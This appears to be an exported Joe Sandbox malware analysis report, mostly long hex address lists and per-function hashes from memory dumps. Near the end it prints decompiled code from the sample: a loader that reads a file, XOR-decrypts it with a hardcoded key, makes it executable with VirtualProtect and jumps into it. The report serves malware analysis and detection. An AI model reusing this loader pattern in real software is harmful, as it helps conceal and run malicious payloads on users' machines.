                                                                                                                        0x01365f50
                                                                                                                        0x01365f50
                                                                                                                        0x01365f57
                                                                                                                        0x01365f66
                                                                                                                        0x01365f66
                                                                                                                        0x01365f66
                                                                                                                        0x01365f68
                                                                                                                        0x01365f6a
                                                                                                                        0x013663d0
                                                                                                                        0x00000000
                                                                                                                        0x01365f70
                                                                                                                        0x01365f70
                                                                                                                        0x01365f91
                                                                                                                        0x01365f9c
                                                                                                                        0x01365f9e
                                                                                                                        0x01365fa4
                                                                                                                        0x01365fa6
                                                                                                                        0x0136638c
                                                                                                                        0x01366392
                                                                                                                        0x013663a1
                                                                                                                        0x013663a7
                                                                                                                        0x013663af
                                                                                                                        0x013663af
                                                                                                                        0x013663bd
                                                                                                                        0x013663d8
                                                                                                                        0x00000000
                                                                                                                        0x013663d8
                                                                                                                        0x01365fac
                                                                                                                        0x01365fb2
                                                                                                                        0x01365fb4
                                                                                                                        0x01365fbd
                                                                                                                        0x01365fc6
                                                                                                                        0x01365fce
                                                                                                                        0x01365fd4
                                                                                                                        0x01365fdc
                                                                                                                        0x01365fec
                                                                                                                        0x01365fed
                                                                                                                        0x01365fee
                                                                                                                        0x01365fef
                                                                                                                        0x01365ff9
                                                                                                                        0x01365ffa
                                                                                                                        0x01365ffb
                                                                                                                        0x01365ffc
                                                                                                                        0x01366000
                                                                                                                        0x01366004
                                                                                                                        0x01366012
                                                                                                                        0x01366012
                                                                                                                        0x01366018
                                                                                                                        0x01366019
                                                                                                                        0x0136601a
                                                                                                                        0x0136601b
                                                                                                                        0x0136601c
                                                                                                                        0x01366020
                                                                                                                        0x01366059
                                                                                                                        0x0136605c
                                                                                                                        0x01366061
                                                                                                                        0x01366061
                                                                                                                        0x01366022
                                                                                                                        0x01366022
                                                                                                                        0x01366022
                                                                                                                        0x01366025
                                                                                                                        0x0136602a
                                                                                                                        0x0136602b
                                                                                                                        0x01366031
                                                                                                                        0x01366037
                                                                                                                        0x01366038
                                                                                                                        0x0136603e
                                                                                                                        0x01366048
                                                                                                                        0x01366049
                                                                                                                        0x0136604a
                                                                                                                        0x0136604b
                                                                                                                        0x0136604c
                                                                                                                        0x0136604d
                                                                                                                        0x01366053
                                                                                                                        0x01366054
                                                                                                                        0x01366054
                                                                                                                        0x01366062
                                                                                                                        0x01366065
                                                                                                                        0x01366067
                                                                                                                        0x0136606a
                                                                                                                        0x01366070
                                                                                                                        0x01366075
                                                                                                                        0x01366076
                                                                                                                        0x01366081
                                                                                                                        0x01366087
                                                                                                                        0x01366095
                                                                                                                        0x01366099
                                                                                                                        0x0136609e
                                                                                                                        0x013660a4
                                                                                                                        0x013660ae
                                                                                                                        0x013660b0
                                                                                                                        0x013660b3
                                                                                                                        0x013660b6
                                                                                                                        0x013660b8
                                                                                                                        0x013660ba
                                                                                                                        0x013660ba
                                                                                                                        0x013660ba
                                                                                                                        0x013660ba
                                                                                                                        0x013660be
                                                                                                                        0x013660c0
                                                                                                                        0x013660c5
                                                                                                                        0x013660c5
                                                                                                                        0x013660c5
                                                                                                                        0x013660c6
                                                                                                                        0x013660cd
                                                                                                                        0x01366114
                                                                                                                        0x013660cf
                                                                                                                        0x013660cf
                                                                                                                        0x013660d4
                                                                                                                        0x013660d5
                                                                                                                        0x013660da
                                                                                                                        0x013660db
                                                                                                                        0x013660e1
                                                                                                                        0x013660e2
                                                                                                                        0x013660e8
                                                                                                                        0x013660f8
                                                                                                                        0x013660fd
                                                                                                                        0x013660fe
                                                                                                                        0x01366102
                                                                                                                        0x01366104
                                                                                                                        0x01366107
                                                                                                                        0x01366109
                                                                                                                        0x0136610b
                                                                                                                        0x0136610b
                                                                                                                        0x0136610b
                                                                                                                        0x0136610b
                                                                                                                        0x0136610f
                                                                                                                        0x0136610f
                                                                                                                        0x01366117
                                                                                                                        0x0136611a
                                                                                                                        0x0136611f
                                                                                                                        0x01366125
                                                                                                                        0x01366134
                                                                                                                        0x01366139
                                                                                                                        0x0136613f
                                                                                                                        0x01366146
                                                                                                                        0x01366148
                                                                                                                        0x0136614b
                                                                                                                        0x0136614d
                                                                                                                        0x0136614f
                                                                                                                        0x0136614f
                                                                                                                        0x0136614f
                                                                                                                        0x0136614f
                                                                                                                        0x01366153
                                                                                                                        0x01366159
                                                                                                                        0x01366159
                                                                                                                        0x0136615c
                                                                                                                        0x01366163
                                                                                                                        0x01366169
                                                                                                                        0x0136616c
                                                                                                                        0x01366172
                                                                                                                        0x01366181
                                                                                                                        0x01366186
                                                                                                                        0x01366187
                                                                                                                        0x0136618b
                                                                                                                        0x01366191
                                                                                                                        0x01366195
                                                                                                                        0x013661a3
                                                                                                                        0x013661bb
                                                                                                                        0x013661c0
                                                                                                                        0x013661c3
                                                                                                                        0x013661cc
                                                                                                                        0x013661d0
                                                                                                                        0x013661dc
                                                                                                                        0x013661de
                                                                                                                        0x013661e1
                                                                                                                        0x013661e4
                                                                                                                        0x013661e6
                                                                                                                        0x013661e8
                                                                                                                        0x013661e8
                                                                                                                        0x013661e8
                                                                                                                        0x013661e8
                                                                                                                        0x013661e6
                                                                                                                        0x013661ec
                                                                                                                        0x013661f3
                                                                                                                        0x01366203
                                                                                                                        0x01366209
                                                                                                                        0x0136620a
                                                                                                                        0x01366216
                                                                                                                        0x0136621d
                                                                                                                        0x01366227
                                                                                                                        0x01366241
                                                                                                                        0x01366246
                                                                                                                        0x0136624c
                                                                                                                        0x01366257
                                                                                                                        0x01366259
                                                                                                                        0x0136625c
                                                                                                                        0x0136625e
                                                                                                                        0x01366260
                                                                                                                        0x01366260
                                                                                                                        0x01366260
                                                                                                                        0x01366260
                                                                                                                        0x0136625e
                                                                                                                        0x01366264
                                                                                                                        0x01366267
                                                                                                                        0x01366269
                                                                                                                        0x01366315
                                                                                                                        0x01366315
                                                                                                                        0x0136631b
                                                                                                                        0x0136631e
                                                                                                                        0x01366324
                                                                                                                        0x01366327
                                                                                                                        0x0136632f
                                                                                                                        0x01366330
                                                                                                                        0x01366333
                                                                                                                        0x0136633a
                                                                                                                        0x0136633c
                                                                                                                        0x01366335
                                                                                                                        0x01366335
                                                                                                                        0x01366335
                                                                                                                        0x0136633f
                                                                                                                        0x01366342
                                                                                                                        0x0136634c
                                                                                                                        0x01366352
                                                                                                                        0x01366355
                                                                                                                        0x01366355
                                                                                                                        0x01366359
                                                                                                                        0x00000000
                                                                                                                        0x0136626f
                                                                                                                        0x01366275
                                                                                                                        0x01366275
                                                                                                                        0x01366278
                                                                                                                        0x0136627e
                                                                                                                        0x0136627e
                                                                                                                        0x01366281
                                                                                                                        0x01366287
                                                                                                                        0x0136628d
                                                                                                                        0x01366298
                                                                                                                        0x0136629c
                                                                                                                        0x013662a2
                                                                                                                        0x0136629e
                                                                                                                        0x0136629e
                                                                                                                        0x0136629e
                                                                                                                        0x013662a7
                                                                                                                        0x013662a7
                                                                                                                        0x013662aa
                                                                                                                        0x013662b0
                                                                                                                        0x013662f0
                                                                                                                        0x013662f0
                                                                                                                        0x013662f2
                                                                                                                        0x013662f8
                                                                                                                        0x013662fd
                                                                                                                        0x013662b2
                                                                                                                        0x013662b2
                                                                                                                        0x013662b2
                                                                                                                        0x013662b5
                                                                                                                        0x013662dd
                                                                                                                        0x013662e2
                                                                                                                        0x013662e5
                                                                                                                        0x013662b7
                                                                                                                        0x013662b8
                                                                                                                        0x013662bb
                                                                                                                        0x013662bd
                                                                                                                        0x013662c0
                                                                                                                        0x013662c4
                                                                                                                        0x013662cd
                                                                                                                        0x013662cd
                                                                                                                        0x013662c0
                                                                                                                        0x013662bb
                                                                                                                        0x013662b5
                                                                                                                        0x01366302
                                                                                                                        0x01366303
                                                                                                                        0x01366305
                                                                                                                        0x01366305
                                                                                                                        0x01366305
                                                                                                                        0x0136630c
                                                                                                                        0x0136630c
                                                                                                                        0x00000000
                                                                                                                        0x0136627e
                                                                                                                        0x01366269
                                                                                                                        0x01365eac
                                                                                                                        0x01365ebb
                                                                                                                        0x01365ebe
                                                                                                                        0x01365ecb
                                                                                                                        0x01365ecb
                                                                                                                        0x01365ece
                                                                                                                        0x01365ece
                                                                                                                        0x01365ed4
                                                                                                                        0x01365ed7
                                                                                                                        0x01365ed9
                                                                                                                        0x01365edb
                                                                                                                        0x01365edb
                                                                                                                        0x01365ee1
                                                                                                                        0x01365ee1
                                                                                                                        0x01365ee3
                                                                                                                        0x01365f20
                                                                                                                        0x01365f20
                                                                                                                        0x01365ee5
                                                                                                                        0x01365ee5
                                                                                                                        0x01365ee5
                                                                                                                        0x01365ee8
                                                                                                                        0x01365f11
                                                                                                                        0x01365f18
                                                                                                                        0x01365eea
                                                                                                                        0x01365eea
                                                                                                                        0x01365eed
                                                                                                                        0x01365ef2
                                                                                                                        0x01365ef8
                                                                                                                        0x01365efb
                                                                                                                        0x01365f0a
                                                                                                                        0x01365f0a
                                                                                                                        0x01365eed
                                                                                                                        0x01365ee8
                                                                                                                        0x01365f22
                                                                                                                        0x01365f28
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x01365f30
                                                                                                                        0x01365f31
                                                                                                                        0x01365f37
                                                                                                                        0x01365f3a
                                                                                                                        0x01365f3d
                                                                                                                        0x01365f44
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x01365f46
                                                                                                                        0x01365f48
                                                                                                                        0x01365f4d
                                                                                                                        0x00000000
                                                                                                                        0x01365f4d
                                                                                                                        0x01365dda
                                                                                                                        0x01365ddf
                                                                                                                        0x00000000
                                                                                                                        0x01365ddf
                                                                                                                        0x01365dd8
                                                                                                                        0x01365da7
                                                                                                                        0x01365da9
                                                                                                                        0x01365dac
                                                                                                                        0x01365dae
                                                                                                                        0x00000000
                                                                                                                        0x01365db4
                                                                                                                        0x01365db4
                                                                                                                        0x00000000
                                                                                                                        0x01365db4
                                                                                                                        0x01365dae
                                                                                                                        0x01365d88
                                                                                                                        0x01365d8d
                                                                                                                        0x01366363
                                                                                                                        0x01366369
                                                                                                                        0x0136636a
                                                                                                                        0x01366370
                                                                                                                        0x01366372
                                                                                                                        0x0136637a
                                                                                                                        0x0136637b
                                                                                                                        0x0136637d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0136637f
                                                                                                                        0x01366385
                                                                                                                        0x00000000
                                                                                                                        0x01366385
                                                                                                                        0x01365d38
                                                                                                                        0x01365d3b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x01365d3b
                                                                                                                        0x01365d27
                                                                                                                        0x01365d29
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x01366360
                                                                                                                        0x00000000
                                                                                                                        0x01366360
                                                                                                                        0x01365c10
                                                                                                                        0x01365c10
                                                                                                                        0x013663da
                                                                                                                        0x013663e5
                                                                                                                        0x013663e5

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: da7be2893a335db658dc79bb9e2fc277e4235437d29e7632be0a6d1d4f0cce57
                                                                                                                        • Instruction ID: 48ee68127b2ddbd5f36c3f2cd151175885003c9b2759e1605b183c3f330a3e51
                                                                                                                        • Opcode Fuzzy Hash: da7be2893a335db658dc79bb9e2fc277e4235437d29e7632be0a6d1d4f0cce57
                                                                                                                        • Instruction Fuzzy Hash: 4C426BB1910229CFDB24CF68C881BA9BBB5FF49348F14C1AAD94DEB246D7309985CF50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9520 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 99f894598faab49fdbcfec7b152433ddf35693b19a2e2fdbd71efe7109dbcb5b
                                                                                                                        • Instruction ID: c324f20406f2d94919569694a7331c3c82295f400471444dfe97df4a48fc47a8
                                                                                                                        • Opcode Fuzzy Hash: 99f894598faab49fdbcfec7b152433ddf35693b19a2e2fdbd71efe7109dbcb5b
                                                                                                                        • Instruction Fuzzy Hash: 8D9002E1211144924500A2A98408B1A4545A7E0281B91D016E5044560CC5658861A275
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012DAD30 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7a9d562f4472000077929541166460fa65ecc7437a86067c098a4115f0cb8cd7
                                                                                                                        • Instruction ID: 9b76d8e6d760145ea8983d10fb3df813c8910cab43dac7dedf75229c5c5cd1b8
                                                                                                                        • Opcode Fuzzy Hash: 7a9d562f4472000077929541166460fa65ecc7437a86067c098a4115f0cb8cd7
                                                                                                                        • Instruction Fuzzy Hash: 02900271A1500412914071A948186564046B7E07C1B95D011A4504554CC9948A6563E1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9560 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a8a285fafb64b077f8819660886f926004011ff4ac65af8daadcf0f4627d88ab
                                                                                                                        • Instruction ID: 987b0f1b586a1c8c00c4f302e0127c8d20452499d4a688178ab89bcbea518ac8
                                                                                                                        • Opcode Fuzzy Hash: a8a285fafb64b077f8819660886f926004011ff4ac65af8daadcf0f4627d88ab
                                                                                                                        • Instruction Fuzzy Hash: A8900265231004020145A5A9060851B0485B7D63D13D1D015F5406590CC66188756361
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9950 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f4fc346e588b46c7e05d72e63dee9c880b57c40630264688394eeb226103033b
                                                                                                                        • Instruction ID: 1e83cbeeb71e2f70f21d042b790584c286a9ab46f76e70966d68f6d0f6534874
                                                                                                                        • Opcode Fuzzy Hash: f4fc346e588b46c7e05d72e63dee9c880b57c40630264688394eeb226103033b
                                                                                                                        • Instruction Fuzzy Hash: E39002A121140803D14065A948086170045A7D0382F91D011A6054555ECA698C617275
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D95F0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 109f1765c4b560ce3c71af49ee51d5421d87c5d531239b0d5698d3146394c671
                                                                                                                        • Instruction ID: a3eabbc3ef72126d4076902e6cf59004a05c0cab9f766c23273e1527a37187c8
                                                                                                                        • Opcode Fuzzy Hash: 109f1765c4b560ce3c71af49ee51d5421d87c5d531239b0d5698d3146394c671
                                                                                                                        • Instruction Fuzzy Hash: B190027121100C02D10461A948086960045A7D0381F91D011AA014655ED6A588A17271
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D99D0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7464a9eec1c9d88f328a96d7194d346d39aa5e996b44c048b9134b85ecf76921
                                                                                                                        • Instruction ID: 5b72745f0cdd80f1527760a0cd9615d429c49cc3bd7dca0f1e0d963579140a5d
                                                                                                                        • Opcode Fuzzy Hash: 7464a9eec1c9d88f328a96d7194d346d39aa5e996b44c048b9134b85ecf76921
                                                                                                                        • Instruction Fuzzy Hash: 189002A122100442D10461A944087160085A7E1281F91D012A6144554CC5698C716265
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9820 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cf9daf74afb01fede2daf452189fd2ad820979fdf8ccd06ea0adf5a36825e76b
                                                                                                                        • Instruction ID: 796ce5830846f1767a6993aa6a69a7fc7402a1005053130fd73bfdcb96055179
                                                                                                                        • Opcode Fuzzy Hash: cf9daf74afb01fede2daf452189fd2ad820979fdf8ccd06ea0adf5a36825e76b
                                                                                                                        • Instruction Fuzzy Hash: 9190027125100802D14171A944086160049B7D02C1FD1D012A4414554EC6958A66BBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012DB040 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7c63e717c9151e45effa6f87dff009db9e225e669e0859daffb8cc8d50735d72
                                                                                                                        • Instruction ID: f253ce4811c730855b0f660427efbc9e9f2fb82d7943496e45f83d60f81c336d
                                                                                                                        • Opcode Fuzzy Hash: 7c63e717c9151e45effa6f87dff009db9e225e669e0859daffb8cc8d50735d72
                                                                                                                        • Instruction Fuzzy Hash: 859002A1611144434540B1A948084165055B7E13813D1D121A4444560CC6A88865A3A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D98A0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 36f386a11205f73059613d1f2404cc0df3658c5a639c2ff350733b19bc4b341c
                                                                                                                        • Instruction ID: d7bc8378900b154603c18599e348fedf61ec4e6b0a1d500a390c80463542d151
                                                                                                                        • Opcode Fuzzy Hash: 36f386a11205f73059613d1f2404cc0df3658c5a639c2ff350733b19bc4b341c
                                                                                                                        • Instruction Fuzzy Hash: C590026131100802D10261A944186160049E7D13C5FD1D012E5414555DC6658963B272
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9B00 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 203c1ffef9a33ef0ce90b3e05c53bf362a36f8a1789dcdba84fdb25e8c57ce21
                                                                                                                        • Instruction ID: 9188f9af70e9555885f32eb0c295e7f002caaada74d2fb6bc819c26d88208c7a
                                                                                                                        • Opcode Fuzzy Hash: 203c1ffef9a33ef0ce90b3e05c53bf362a36f8a1789dcdba84fdb25e8c57ce21
                                                                                                                        • Instruction Fuzzy Hash: 7790026125100C02D14071A984187170046E7D0681F91D011A4014554DC656897577F1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012DA3B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a3f8998e74ad2fd843cc5f27126e08d5632d71ebe60e3b9456f99a3a6eb77d89
                                                                                                                        • Instruction ID: 049e5921689fb9d41eafea6212247a747a521ee0cea71228f7bf4f456bad741f
                                                                                                                        • Opcode Fuzzy Hash: a3f8998e74ad2fd843cc5f27126e08d5632d71ebe60e3b9456f99a3a6eb77d89
                                                                                                                        • Instruction Fuzzy Hash: 1090027121144402D14071A9844861B5045B7E0381F91D411E4415554CC6558866A361
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9A10 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2c7fd12f38cf6ba44e5e3ffadb21cfbf5581d5c151c13731891e25f6bf960b0a
                                                                                                                        • Instruction ID: bb7dc63137e12aad8bfb541bf63074917a029850d3f5d31e0e7fedfd0257cfdf
                                                                                                                        • Opcode Fuzzy Hash: 2c7fd12f38cf6ba44e5e3ffadb21cfbf5581d5c151c13731891e25f6bf960b0a
                                                                                                                        • Instruction Fuzzy Hash: E790027121140802D10061A9480C7570045A7D0382F91D011A9154555EC6A5C8A17671
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9A80 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4c5810f2100793e2c9b8cd01865777b4dac893372c309bbd98ff1b77a1b23805
                                                                                                                        • Instruction ID: e07f393dbf1e12c49d4e07775197961af90466f86342fd1bdaa91e5479ab51e1
                                                                                                                        • Opcode Fuzzy Hash: 4c5810f2100793e2c9b8cd01865777b4dac893372c309bbd98ff1b77a1b23805
                                                                                                                        • Instruction Fuzzy Hash: E890026121144842D14062A94808B1F4145A7E1282FD1D019A8146554CC95588656761
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C51000 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 56%
                                                                                                                        			E00C51000(intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v20;
				char* _v24;
				long _v28;
				void* _v32;
				long _v36;
				void* _t51;
				void* _t60;
				void* _t70;
				void* _t71;
				void* _t79;

				_v12 = 0;
				_v28 = 0;
				_v24 = "248058040134";
				_v20 = E00C51729(_a12, 0xc60088);
				_push(2);
				_push(0);
				_push(_v20);
				E00C51C92(_t51, _t60, _t70, _t71, _t79);
				_t61 = _v20;
				_push(_v20);
				_v28 = E00C51B9A(_t51, _v20, _t70, _t71, _t79);
				_push(0);
				_push(0);
				_push(_v20);
				E00C51C92(_t51, _v20, _t70, _t71, _t79);
				_v32 = E00C51514(_t51, _t61, _t70, _v28);
				E00C519E0(_v32, _v28, 1, _v20);
				while(_v12 < _v28) {
					asm("cdq");
					 *(_v32 + _v12) =  *(_v32 + _v12) & 0x000000ff ^ _v24[_v12 % 0xc] & 0x000000ff;
					_v12 = _v12 + 1;
				}
				VirtualProtect(_v32, _v28, 0x40,  &_v36);
				goto __eax;
			}














                                                                                                                        0x00c51006
                                                                                                                        0x00c5100d
                                                                                                                        0x00c51014
                                                                                                                        0x00c5102c
                                                                                                                        0x00c5102f
                                                                                                                        0x00c51031
                                                                                                                        0x00c51036
                                                                                                                        0x00c51037
                                                                                                                        0x00c5103f
                                                                                                                        0x00c51042
                                                                                                                        0x00c5104b
                                                                                                                        0x00c5104e
                                                                                                                        0x00c51050
                                                                                                                        0x00c51055
                                                                                                                        0x00c51056
                                                                                                                        0x00c5106a
                                                                                                                        0x00c5107b
                                                                                                                        0x00c51083
                                                                                                                        0x00c5108e
                                                                                                                        0x00c510ae
                                                                                                                        0x00c510b6
                                                                                                                        0x00c510b6
                                                                                                                        0x00c510c9
                                                                                                                        0x00c510d2

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00C51729: __fsopen.LIBCMT ref: 00C51736
                                                                                                                        • _fseek.LIBCMT ref: 00C51037
                                                                                                                        • _ftell.LIBCMT ref: 00C51043
                                                                                                                        • _fseek.LIBCMT ref: 00C51056
                                                                                                                          • Part of subcall function 00C51C92: __lock_file.LIBCMT ref: 00C51CDD
                                                                                                                          • Part of subcall function 00C51C92: __fseek_nolock.LIBCMT ref: 00C51CED
                                                                                                                        • _malloc.LIBCMT ref: 00C51062
                                                                                                                          • Part of subcall function 00C51514: __FF_MSGBANNER.LIBCMT ref: 00C51537
                                                                                                                          • Part of subcall function 00C51514: __NMSG_WRITE.LIBCMT ref: 00C5153E
                                                                                                                          • Part of subcall function 00C51514: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,00C5641C,?,00000001,?,?,00C521F7,00000018,00C5D4A8,0000000C,00C52288), ref: 00C5158B
                                                                                                                        • __fread_nolock.LIBCMT ref: 00C5107B
                                                                                                                        • VirtualProtect.KERNEL32(?,00000000,00000040,?), ref: 00C510C9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303529838.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.303519410.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303544198.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303551513.0000000000C5F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303557762.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
